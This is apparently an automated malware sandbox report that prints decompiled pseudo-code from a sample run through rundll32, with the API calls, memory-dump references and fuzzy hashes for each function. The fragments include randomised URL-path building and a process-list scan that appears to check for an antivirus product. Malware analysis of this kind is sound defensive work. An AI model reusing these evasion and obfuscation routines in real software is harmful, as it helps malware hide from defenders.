                                          					_t19 =  *0x4fdd110( *_t32, 0x20);
                                          					if(_t19 != 0) {
                                          						 *_t19 = 0;
                                          						_t19 = _t19 + 2;
                                          					}
                                          					_t31 = E04FD7827(0,  *_t32, _t19, 0);
                                          					if(_t31 == 0) {
                                          						if(_t25 == 0) {
                                          							L22:
                                          							return _t31;
                                          						}
                                          						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                          						if(_t31 == 0) {
                                          							L20:
                                          							if(_t25 != 0) {
                                          								CloseHandle(_t25);
                                          							}
                                          							goto L22;
                                          						}
                                          					}
                                          					goto L12;
                                          				}
                                          			}















                                          APIs
                                            • Part of subcall function 04FD6AF7: lstrlen.KERNEL32(?,00000000,00000000,00000027,00000005,00000000,00000000,04FD2098,74666F53,00000000,?,04FDD00C,?,?), ref: 04FD6B2D
                                            • Part of subcall function 04FD6AF7: lstrcpy.KERNEL32(00000000,00000000), ref: 04FD6B51
                                            • Part of subcall function 04FD6AF7: lstrcat.KERNEL32(00000000,00000000), ref: 04FD6B59
                                          • CreateEventA.KERNEL32(04FDD2A8,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,04FD555B,?,?,?), ref: 04FD7333
                                            • Part of subcall function 04FD147E: HeapFree.KERNEL32(00000000,00000000,04FD1D11,00000000,?,?,-00000008), ref: 04FD148A
                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,04FD555B,00000000,00000000,?,00000000,?,04FD555B,?,?,?), ref: 04FD7393
                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,04FD555B,?,?,?), ref: 04FD73C1
                                          • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,04FD555B,?,?,?), ref: 04FD73D9
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                          • String ID:
                                          • API String ID: 73268831-0
                                          • Opcode ID: 0f3a824b298cf2e6f4937cb8a77667efe86a2577b4ebb741e35144432500eda7
                                          • Instruction ID: 8ade631b3973b564e3c78353e47802f23d26f52224007bdb2e5753cd45bd7bd8
                                          • Opcode Fuzzy Hash: 0f3a824b298cf2e6f4937cb8a77667efe86a2577b4ebb741e35144432500eda7
                                          • Instruction Fuzzy Hash: E021F032A012869BDB317EB8AC84A6B73DBEB88715B0D0634FD52DF144DB64EC028690
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 38%
                                          			E04FDA1F1(void* __ecx, void* __esi) {
                                          				char _v8;
                                          				long _v12;
                                          				char _v16;
                                          				long _v20;
                                          				long _t34;
                                          				long _t39;
                                          				long _t42;
                                          				long _t56;
                                          				intOrPtr _t58;
                                          				void* _t59;
                                          				intOrPtr* _t60;
                                          				void* _t61;
                                          
                                          				_t61 = __esi;
                                          				_t59 = __ecx;
                                          				_t60 =  *0x4fdd140; // 0x4fdad41
                                          				 *((intOrPtr*)(__esi + 0x2c)) = 0;
                                          				do {
                                          					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
                                          					_v20 = _t34;
                                          					if(_t34 != 0) {
                                          						L3:
                                          						_push( &_v16);
                                          						_push( &_v8);
                                          						_push(_t61 + 0x2c);
                                          						_push(0x20000013);
                                          						_push( *((intOrPtr*)(_t61 + 0x18)));
                                          						_v8 = 4;
                                          						_v16 = 0;
                                          						if( *_t60() == 0) {
                                          							_t39 = GetLastError();
                                          							_v12 = _t39;
                                          							if(_v20 == 0 || _t39 != 0x2ef3) {
                                          								L15:
                                          								return _v12;
                                          							} else {
                                          								goto L11;
                                          							}
                                          						}
                                          						if(_v8 != 4 ||  *((intOrPtr*)(_t61 + 0x2c)) == 0) {
                                          							goto L11;
                                          						} else {
                                          							_v16 = 0;
                                          							_v8 = 0;
                                          							 *_t60( *((intOrPtr*)(_t61 + 0x18)), 0x16, 0,  &_v8,  &_v16);
                                          							_t58 = E04FD58BE(_v8 + 1);
                                          							if(_t58 == 0) {
                                          								_v12 = 8;
                                          							} else {
                                          								_push( &_v16);
                                          								_push( &_v8);
                                          								_push(_t58);
                                          								_push(0x16);
                                          								_push( *((intOrPtr*)(_t61 + 0x18)));
                                          								if( *_t60() == 0) {
                                          									E04FD147E(_t58);
                                          									_v12 = GetLastError();
                                          								} else {
                                          									 *((char*)(_t58 + _v8)) = 0;
                                          									 *((intOrPtr*)(_t61 + 0xc)) = _t58;
                                          								}
                                          							}
                                          							goto L15;
                                          						}
                                          					}
                                          					SetEvent( *(_t61 + 0x1c));
                                          					_t56 =  *((intOrPtr*)(_t61 + 0x28));
                                          					_v12 = _t56;
                                          					if(_t56 != 0) {
                                          						goto L15;
                                          					}
                                          					goto L3;
                                          					L11:
                                          					_t42 = E04FD9D3A( *(_t61 + 0x1c), _t59, 0xea60);
                                          					_v12 = _t42;
                                          				} while (_t42 == 0);
                                          				goto L15;
                                          			}
















                                          APIs
                                          • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,751881D0), ref: 04FDA208
                                          • SetEvent.KERNEL32(?), ref: 04FDA218
                                          • GetLastError.KERNEL32 ref: 04FDA2A1
                                            • Part of subcall function 04FD9D3A: WaitForMultipleObjects.KERNEL32(00000002,04FDAA33,00000000,04FDAA33,?,?,?,04FDAA33,0000EA60), ref: 04FD9D55
                                            • Part of subcall function 04FD147E: HeapFree.KERNEL32(00000000,00000000,04FD1D11,00000000,?,?,-00000008), ref: 04FD148A
                                          • GetLastError.KERNEL32(00000000), ref: 04FDA2D6
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                          • String ID:
                                          • API String ID: 602384898-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 39%
                                          			E04FD54AC(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                                          				intOrPtr _v12;
                                          				void* _v16;
                                          				void* _v28;
                                          				char _v32;
                                          				void* __esi;
                                          				void* _t29;
                                          				void* _t38;
                                          				signed int* _t39;
                                          				void* _t40;
                                          
                                          				_t36 = __ecx;
                                          				_v32 = 0;
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				_v12 = _a4;
                                          				_t38 = E04FD4F1F(__ecx,  &_v32);
                                          				if(_t38 != 0) {
                                          					L12:
                                          					_t39 = _a8;
                                          					L13:
                                          					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                                          						_t23 =  &(_t39[1]);
                                          						if(_t39[1] != 0) {
                                          							E04FD5749(_t23);
                                          						}
                                          					}
                                          					return _t38;
                                          				}
                                          				if(E04FD9138(0x40,  &_v16) != 0) {
                                          					_v16 = 0;
                                          				}
                                          				_t40 = CreateEventA(0x4fdd2a8, 1, 0,  *0x4fdd340);
                                          				if(_t40 != 0) {
                                          					SetEvent(_t40);
                                          					Sleep(0xbb8);
                                          					CloseHandle(_t40);
                                          				}
                                          				_push( &_v32);
                                          				if(_a12 == 0) {
                                          					_t29 = E04FD9575(_t36);
                                          				} else {
                                          					_push(0);
                                          					_push(0);
                                          					_push(0);
                                          					_push(0);
                                          					_push(0);
                                          					_t29 = E04FDA642(_t36);
                                          				}
                                          				_t41 = _v16;
                                          				_t38 = _t29;
                                          				if(_v16 != 0) {
                                          					E04FD568A(_t41);
                                          				}
                                          				if(_t38 != 0) {
                                          					goto L12;
                                          				} else {
                                          					_t39 = _a8;
                                          					_t38 = E04FD72F2( &_v32, _t39);
                                          					goto L13;
                                          				}
                                          			}













                                          APIs
                                          • CreateEventA.KERNEL32(04FDD2A8,00000001,00000000,00000040,?,?,7519F710,00000000,7519F730), ref: 04FD54FD
                                          • SetEvent.KERNEL32(00000000), ref: 04FD550A
                                          • Sleep.KERNEL32(00000BB8), ref: 04FD5515
                                          • CloseHandle.KERNEL32(00000000), ref: 04FD551C
                                            • Part of subcall function 04FD9575: WaitForSingleObject.KERNEL32(00000000,?,?,?,04FD553C,?,04FD553C,?,?,?,?,?,04FD553C,?), ref: 04FD964F
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                          • String ID:
                                          • API String ID: 2559942907-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 68%
                                          			E04FD4858(unsigned int __eax, void* __ecx) {
                                          				void* _v8;
                                          				void* _v12;
                                          				signed int _t21;
                                          				signed short _t23;
                                          				char* _t27;
                                          				void* _t29;
                                          				void* _t30;
                                          				unsigned int _t33;
                                          				void* _t37;
                                          				unsigned int _t38;
                                          				void* _t41;
                                          				void* _t42;
                                          				int _t45;
                                          				void* _t46;
                                          
                                          				_t42 = __eax;
                                          				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
                                          				_t38 = __eax;
                                          				_t30 = RtlAllocateHeap( *0x4fdd238, 0, (__eax >> 3) + __eax + 1);
                                          				_v12 = _t30;
                                          				if(_t30 != 0) {
                                          					_v8 = _t42;
                                          					do {
                                          						_t33 = 0x18;
                                          						if(_t38 <= _t33) {
                                          							_t33 = _t38;
                                          						}
                                          						_t21 =  *0x4fdd250; // 0x82e8f92b
                                          						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
                                          						 *0x4fdd250 = _t23;
                                          						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                                          						memcpy(_t30, _v8, _t45);
                                          						_v8 = _v8 + _t45;
                                          						_t27 = _t30 + _t45;
                                          						_t38 = _t38 - _t45;
                                          						_t46 = _t46 + 0xc;
                                          						 *_t27 = 0x2f;
                                          						_t13 = _t27 + 1; // 0x1
                                          						_t30 = _t13;
                                          					} while (_t38 > 8);
                                          					memcpy(_t30, _v8, _t38 + 1);
                                          				}
                                          				return _v12;
                                          			}


















                                          APIs
                                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04FD4DBF,00000000,?,?,04FD52FE,?,075295B0), ref: 04FD4863
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 04FD487B
                                          • memcpy.NTDLL(00000000,?,-00000008,?,?,?,04FD4DBF,00000000,?,?,04FD52FE,?,075295B0), ref: 04FD48BF
                                          • memcpy.NTDLL(00000001,?,00000001), ref: 04FD48E0
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: memcpy$AllocateHeaplstrlen
                                          • String ID:
                                          • API String ID: 1819133394-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 53%
                                          			E04FD6AF7(intOrPtr _a4, intOrPtr _a8) {
                                          				char _v20;
                                          				void* _t8;
                                          				void* _t13;
                                          				void* _t16;
                                          				char* _t18;
                                          				void* _t19;
                                          
                                          				_t19 = 0x27;
                                          				_t1 =  &_v20; // 0x74666f53
                                          				_t18 = 0;
                                          				E04FD6F89(_t8, _t1);
                                          				_t16 = E04FD58BE(_t19);
                                          				if(_t16 != 0) {
                                          					_t3 =  &_v20; // 0x74666f53
                                          					_t13 = E04FD9038(_t3, _t16, _a8);
                                          					if(_a4 != 0) {
                                          						__imp__(_a4);
                                          						_t19 = _t13 + 0x27;
                                          					}
                                          					_t18 = E04FD58BE(_t19);
                                          					if(_t18 != 0) {
                                          						 *_t18 = 0;
                                          						if(_a4 != 0) {
                                          							__imp__(_t18, _a4);
                                          						}
                                          						__imp__(_t18, _t16);
                                          					}
                                          					E04FD147E(_t16);
                                          				}
                                          				return _t18;
                                          			}










                                          APIs
                                            • Part of subcall function 04FD58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04FD1C51), ref: 04FD58CA
                                            • Part of subcall function 04FD9038: wsprintfA.USER32 ref: 04FD9094
                                          • lstrlen.KERNEL32(?,00000000,00000000,00000027,00000005,00000000,00000000,04FD2098,74666F53,00000000,?,04FDD00C,?,?), ref: 04FD6B2D
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04FD6B51
                                          • lstrcat.KERNEL32(00000000,00000000), ref: 04FD6B59
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
                                          • String ID: Soft
                                          • API String ID: 393707159-3753413193
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 68%
                                          			E04FD56A2() {
                                          				char _v264;
                                          				void* _v300;
                                          				int _t8;
                                          				intOrPtr _t9;
                                          				int _t15;
                                          				void* _t17;
                                          
                                          				_t15 = 0;
                                          				_t17 = CreateToolhelp32Snapshot(2, 0);
                                          				if(_t17 != 0) {
                                          					_t8 = Process32First(_t17,  &_v300);
                                          					while(_t8 != 0) {
                                          						_t9 =  *0x4fdd2a4; // 0x254a5a8
                                          						_t2 = _t9 + 0x4fdee38; // 0x73617661
                                          						_push( &_v264);
                                          						if( *0x4fdd0fc() != 0) {
                                          							_t15 = 1;
                                          						} else {
                                          							_t8 = Process32Next(_t17,  &_v300);
                                          							continue;
                                          						}
                                          						L7:
                                          						CloseHandle(_t17);
                                          						goto L8;
                                          					}
                                          					goto L7;
                                          				}
                                          				L8:
                                          				return _t15;
                                          			}










                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04FD56B2
                                          • Process32First.KERNEL32(00000000,?), ref: 04FD56C5
                                          • Process32Next.KERNEL32(00000000,?), ref: 04FD56F1
                                          • CloseHandle.KERNEL32(00000000), ref: 04FD5700
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                          • String ID:
                                          • API String ID: 420147892-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E04FD7283(void* __esi) {
                                          				struct _SECURITY_ATTRIBUTES* _v4;
                                          				void* _t8;
                                          				void* _t10;
                                          
                                          				_v4 = 0;
                                          				memset(__esi, 0, 0x38);
                                          				_t8 = CreateEventA(0, 1, 0, 0);
                                          				 *(__esi + 0x1c) = _t8;
                                          				if(_t8 != 0) {
                                          					_t10 = CreateEventA(0, 1, 1, 0);
                                          					 *(__esi + 0x20) = _t10;
                                          					if(_t10 == 0) {
                                          						CloseHandle( *(__esi + 0x1c));
                                          					} else {
                                          						_v4 = 1;
                                          					}
                                          				}
                                          				return _v4;
                                          			}







                                          APIs
                                          • memset.NTDLL ref: 04FD7291
                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,751881D0), ref: 04FD72A6
                                          • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 04FD72B3
                                          • CloseHandle.KERNEL32(?), ref: 04FD72C5
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: CreateEvent$CloseHandlememset
                                          • String ID:
                                          • API String ID: 2812548120-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 68%
                                          			E04FDA2EF(int __eax, char _a4) {
                                          				void* _v0;
                                          				void* _t12;
                                          				int _t13;
                                          				int _t14;
                                          
                                          				_t1 =  &_a4; // 0x4d283a53
                                          				_t14 = __eax;
                                          				__imp__( *_t1);
                                          				_t13 = __eax;
                                          				if(__eax > __eax) {
                                          					_t14 = __eax;
                                          				}
                                          				_t2 = _t14 + 1; // 0x1
                                          				_t12 = E04FD58BE(_t2);
                                          				if(_t12 != 0) {
                                          					memcpy(_t12, _v0, _t13);
                                          					memset(_t12 + _t13, 0, _t14 - _t13 + 1);
                                          				}
                                          				return _t12;
                                          			}








                                          APIs
                                          • lstrlen.KERNEL32(S:(M,00000000,7748D3B0,?,04FD9AA8,00000000,00000005,04FDD00C,00000008,?,?,59935A40,?,?,59935A40), ref: 04FDA2F8
                                          • memcpy.NTDLL(00000000,?,00000000,00000001,?,?,?,04FD4A8B,?,?,?,4D283A53,?,?), ref: 04FDA31B
                                          • memset.NTDLL ref: 04FDA32A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlenmemcpymemset
                                          • String ID: S:(M
                                          • API String ID: 4042389641-2217774225
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E04FD78AD() {
                                          				void* _t1;
                                          				intOrPtr _t5;
                                          				void* _t6;
                                          				void* _t7;
                                          				void* _t11;
                                          
                                          				_t1 =  *0x4fdd26c; // 0x3d0
                                          				if(_t1 == 0) {
                                          					L8:
                                          					return 0;
                                          				}
                                          				SetEvent(_t1);
                                          				_t11 = 0x7fffffff;
                                          				while(1) {
                                          					SleepEx(0x64, 1);
                                          					_t5 =  *0x4fdd2b8; // 0x0
                                          					if(_t5 == 0) {
                                          						break;
                                          					}
                                          					_t11 = _t11 - 0x64;
                                          					if(_t11 > 0) {
                                          						continue;
                                          					}
                                          					break;
                                          				}
                                          				_t6 =  *0x4fdd26c; // 0x3d0
                                          				if(_t6 != 0) {
                                          					CloseHandle(_t6);
                                          				}
                                          				_t7 =  *0x4fdd238; // 0x7130000
                                          				if(_t7 != 0) {
                                          					HeapDestroy(_t7);
                                          				}
                                          				goto L8;
                                          			}









                                          APIs
                                          • SetEvent.KERNEL32(000003D0,00000001,04FD6F2D), ref: 04FD78B8
                                          • SleepEx.KERNEL32(00000064,00000001), ref: 04FD78C7
                                          • CloseHandle.KERNEL32(000003D0), ref: 04FD78E8
                                          • HeapDestroy.KERNEL32(07130000), ref: 04FD78F8
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: CloseDestroyEventHandleHeapSleep
                                          • String ID:
                                          • API String ID: 4109453060-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 50%
                                          			E04FD4C3A(void** __esi) {
                                          				char* _v0;
                                          				intOrPtr _t4;
                                          				intOrPtr _t6;
                                          				void* _t8;
                                          				intOrPtr _t11;
                                          				void* _t12;
                                          				void** _t14;
                                          
                                          				_t14 = __esi;
                                          				_t4 =  *0x4fdd324; // 0x75295b0
                                          				__imp__(_t4 + 0x40);
                                          				while(1) {
                                          					_t6 =  *0x4fdd324; // 0x75295b0
                                          					_t1 = _t6 + 0x58; // 0x0
                                          					if( *_t1 == 0) {
                                          						break;
                                          					}
                                          					Sleep(0xa);
                                          				}
                                          				_t8 =  *_t14;
                                          				if(_t8 != 0 && _t8 != 0x4fdd030) {
                                          					HeapFree( *0x4fdd238, 0, _t8);
                                          				}
                                          				_t14[1] = E04FD7C75(_v0, _t14);
                                          				_t11 =  *0x4fdd324; // 0x75295b0
                                          				_t12 = _t11 + 0x40;
                                          				__imp__(_t12);
                                          				return _t12;
                                          			}











                                          APIs
                                          • RtlEnterCriticalSection.NTDLL(07529570), ref: 04FD4C43
                                          • Sleep.KERNEL32(0000000A,?,?,?,04FD4A8B,?,?,?,4D283A53,?,?), ref: 04FD4C4D
                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,04FD4A8B,?,?,?,4D283A53,?,?), ref: 04FD4C75
                                          • RtlLeaveCriticalSection.NTDLL(07529570), ref: 04FD4C91
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                          • String ID:
                                          • API String ID: 58946197-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 37%
                                          			E04FD9B10() {
                                          				void* _v0;
                                          				void** _t3;
                                          				void** _t5;
                                          				void** _t7;
                                          				void** _t8;
                                          				void* _t10;
                                          
                                          				_t3 =  *0x4fdd324; // 0x75295b0
                                          				__imp__( &(_t3[0x10]));
                                          				while(1) {
                                          					_t5 =  *0x4fdd324; // 0x75295b0
                                          					_t1 =  &(_t5[0x16]); // 0x0
                                          					if( *_t1 == 0) {
                                          						break;
                                          					}
                                          					Sleep(0xa);
                                          				}
                                          				_t7 =  *0x4fdd324; // 0x75295b0
                                          				_t10 =  *_t7;
                                          				if(_t10 != 0 && _t10 != 0x4fde845) {
                                          					HeapFree( *0x4fdd238, 0, _t10);
                                          					_t7 =  *0x4fdd324; // 0x75295b0
                                          				}
                                          				 *_t7 = _v0;
                                          				_t8 =  &(_t7[0x10]);
                                          				__imp__(_t8);
                                          				return _t8;
                                          			}










                                          APIs
                                          • RtlEnterCriticalSection.NTDLL(07529570), ref: 04FD9B19
                                          • Sleep.KERNEL32(0000000A,?,?,?,04FD4A8B,?,?,?,4D283A53,?,?), ref: 04FD9B23
                                          • HeapFree.KERNEL32(00000000,?,?,?,?,04FD4A8B,?,?,?,4D283A53,?,?), ref: 04FD9B51
                                          • RtlLeaveCriticalSection.NTDLL(07529570), ref: 04FD9B66
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                          • String ID:
                                          • API String ID: 58946197-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E04FD6B6E(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                                          				intOrPtr* _v8;
                                          				void* _t17;
                                          				intOrPtr* _t22;
                                          				void* _t27;
                                          				char* _t30;
                                          				void* _t33;
                                          				void* _t34;
                                          				void* _t36;
                                          				void* _t37;
                                          				void* _t39;
                                          				int _t42;
                                          
                                          				_t17 = __eax;
                                          				_t37 = 0;
                                          				__imp__(_a4, _t33, _t36, _t27, __ecx);
                                          				_t2 = _t17 + 1; // 0x1
                                          				_t28 = _t2;
                                          				_t34 = E04FD58BE(_t2);
                                          				if(_t34 != 0) {
                                          					_t30 = E04FD58BE(_t28);
                                          					if(_t30 == 0) {
                                          						E04FD147E(_t34);
                                          					} else {
                                          						_t39 = _a4;
                                          						_t22 = E04FDA8D2(_t39);
                                          						_v8 = _t22;
                                          						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                                          							_a4 = _t39;
                                          						} else {
                                          							_t26 = _t22 + 2;
                                          							_a4 = _t22 + 2;
                                          							_t22 = E04FDA8D2(_t26);
                                          							_v8 = _t22;
                                          						}
                                          						if(_t22 == 0) {
                                          							__imp__(_t34, _a4);
                                          							 *_t30 = 0x2f;
                                          							 *((char*)(_t30 + 1)) = 0;
                                          						} else {
                                          							_t42 = _t22 - _a4;
                                          							memcpy(_t34, _a4, _t42);
                                          							 *((char*)(_t34 + _t42)) = 0;
                                          							__imp__(_t30, _v8);
                                          						}
                                          						 *_a8 = _t34;
                                          						_t37 = 1;
                                          						 *_a12 = _t30;
                                          					}
                                          				}
                                          				return _t37;
                                          			}















                                          APIs
                                          • lstrlen.KERNEL32(00000000,00000008,?,75144D40,?,?,04FDA006,?,?,?,?,00000102,04FD66AF,?,?,00000000), ref: 04FD6B7A
                                            • Part of subcall function 04FD58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04FD1C51), ref: 04FD58CA
                                            • Part of subcall function 04FDA8D2: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,04FD6BA8,00000000,00000001,00000001,?,?,04FDA006,?,?,?,?,00000102), ref: 04FDA8E0
                                            • Part of subcall function 04FDA8D2: StrChrA.SHLWAPI(?,0000003F,?,?,04FDA006,?,?,?,?,00000102,04FD66AF,?,?,00000000,00000000), ref: 04FDA8EA
                                          • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04FDA006,?,?,?,?,00000102,04FD66AF,?), ref: 04FD6BD8
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04FD6BE8
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04FD6BF4
